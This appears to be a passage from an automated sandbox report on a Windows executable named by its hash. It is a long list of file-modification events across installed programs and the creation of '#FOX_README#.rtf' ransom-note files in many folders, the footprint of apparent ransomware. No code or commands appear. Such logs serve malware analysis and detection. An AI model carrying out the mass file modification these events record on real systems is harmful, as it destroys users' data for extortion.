C:\Program Files\Java\jdk1.7.0_80\jre\bin\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Pacific\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\schemagen.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jps.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Danmarkshavn f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_it.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vincennes f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Bangkok f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Davis f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\co\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Boa_Vista f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\nb\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macTSFrame.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\css\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.change_2.10.0.v20140901-1043.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.jdp.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Stanley f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-10 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\zh-CN.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\anevia_streams.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-spi-quicksearch.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-loaders_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_shared.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-output2.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services_1.1.0.v20140328-1925.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.reconciler.dropins.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\conticon.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-windows_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Runtime\x64\resources\1033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Jamaica f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-lib-uihandler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\vlm_export.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\jquery-ui-1.8.13.custom.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\amd64\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mexico_City f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-jvmstat.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\resources.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Resources\1033\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Catamarca f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.historicaldata.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler-ui.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Araguaina f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-oql.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Wallis f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.util_1.0.500.v20130404-1337.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security.win32.x86_64_1.0.100.v20130327-1442.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\management\snmp.acl.template f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_zh_4.4.0.v20140623020002\epl-v10.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\MSBuild\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.descriptorProvider.exsd f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\pop3.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\tzmappings f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\ext\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\ECLIPSE_.RSA f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-api-progress.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-queries.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-annotations-common.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler-utilities.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Checkers.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\VisualElements\LogoCanary.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\NEWS.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Kabul f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Atlantic\South_Georgia f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\MST7MDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-queries.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\or\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-keyring-fallback.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-tabcontrol.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\shortcuts_log.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Porto_Velho f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\MDIParent.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Mawson f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-profiler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\classlist f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Kerguelen f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-profiling.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Christmas f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Tbilisi f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jstack.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-options.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_zh_HK.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\jaccess.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Ulaanbaatar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\MST7MDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-heapdump.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-awt.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Real.mpp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Martinique f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Rarotonga f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\updater.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.inject_1.0.0.v20091030.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.widgets_1.0.0.v20140514-1823.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-lib-profiler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.console_5.5.0.165303\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Andorra f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-host-views.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroTextExtractor.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.p2.ui.overridden_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-modules-appui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateBroker.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Midway f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-api.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\ta.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Resolute 